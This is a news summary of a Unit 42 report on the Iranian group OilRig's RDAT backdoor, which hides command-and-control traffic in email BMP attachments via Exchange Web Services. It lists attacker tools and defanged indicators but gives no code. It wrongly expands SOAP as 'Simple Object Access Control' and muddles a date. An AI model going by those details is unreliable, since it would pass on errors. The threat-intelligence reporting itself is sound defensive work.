A recent slew of cyberattacks has targeted a telecom company in the Middle East. The malicious group behind the attack is OilRig, an Iranian threat group that uses sophisticated techniques such as advanced persistent threat (APT) and social engineering to exploit human and software vulnerabilities.
Palo Alto Networks’ Unit 42 first observed the attacks back in April. It was discovered that there was a revised backdoor tool called RDAT. What stood out during the investigation was RDAT’s novel command-and-control (C2) channel. It was used to hide data and commands inside images attached to emails, a technique called steganography.
OilRig first used this backdoor in 2017 but has been updated multiple times since then. Timestamps suggest that the hacker group added steganography to RDAT around 2018.
Unit 42’s report notes the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communication was added to RDAT in June 2018. This email based C2 channel relies on steganography to hide commands and exfiltrates data within BMP images attached to the emails. By combining these two factors together, it can increasingly evade detection and it can be more difficult to detect.
It was also noted that in the telecom campaign, OilRig used Mimikatz tools. These tools were used to steal credentials and escalate privilege. Bitvise was used to create SSH tunnels and PowerShell downloaders to perform post exploitation activities.
According to Unit 42, two of the tools collected had PDB paths which were C:\Users\Void\Desktop\dns\client\x64\Release\client.pdb and C:\Users\Void\Desktop\RDAT\client\x64\Release\client.pdb. Unit 42 gathered samples with the file path of the user in the pdb string of C”\Users\Void\Desktop. Through these samples, they were able to identify an OilRig tool called ISMDOOR.
The C2 Channel
RDAT communicates with two hard coded email addresses, koko@acrlee[.]com and h76y@acrlee[.]com that are controlled by the threat actors. The emails it sends to these email addresses have Bitmap images attached that contain hidden images or data to exfiltrate.
The payload uses the email associated with the account logged into the compromised host in order to send emails from it. The report discusses that the WinHTTP library is also used to make requests to the API. This automatically attempts to log onto Exchange using the default credentials.
The hacker group OilRig, in turn communicates with RDAT when sending emails to the compromised account. An inbox rule is created to move incoming C2 messages to the Junk folder by RDAT. It also looks for hidden commands within Bitmap images.
According to researchers, the payload issues a request to the EWS API to check for any unread emails sent. If there are any emails obtained, the payload will process the response to the SOAP request. Additional requests may be sent to the EWS API to get the email and the attachment. The content is then saved to a file in the %TEMP% folder with a ‘.bmp’ file extension. After that, a SOAP (Simple Object Access Control) request is issued to delete the processed email.
Researchers also discussed that the email C2 channel supplements HTTP and DNS-tunneling C2 channels also observed in other RDAT samples. The backdoor can execute commands, take screenshots, upload and download to/from the C2, restart processes and delete itself.
The report concludes that a combination of HTTP and DNS tunneling channels were used in most samples obtained. This shows how OilRig is continually developing their tactics with a modified C2 channel and by incorporating steganography.
OilRig Continues to be Active
Believed to be sponsored by the state, OilRig is supported by the Iranian intelligence agency and the Islamic Revolutionary Guard Corps (IRGC). OilRig appears to be engaging in espionage efforts at financial, aviation, infrastructure, government, and university organizations in the Middle East.
The group also goes by Cobalt Gypsy, Crambus, Helix Kitten, or APT34. They are known to develop and evolve their tools often. Earlier this year, they were working on a destructive wiper malware known as ZeroCleare that was spotted in December.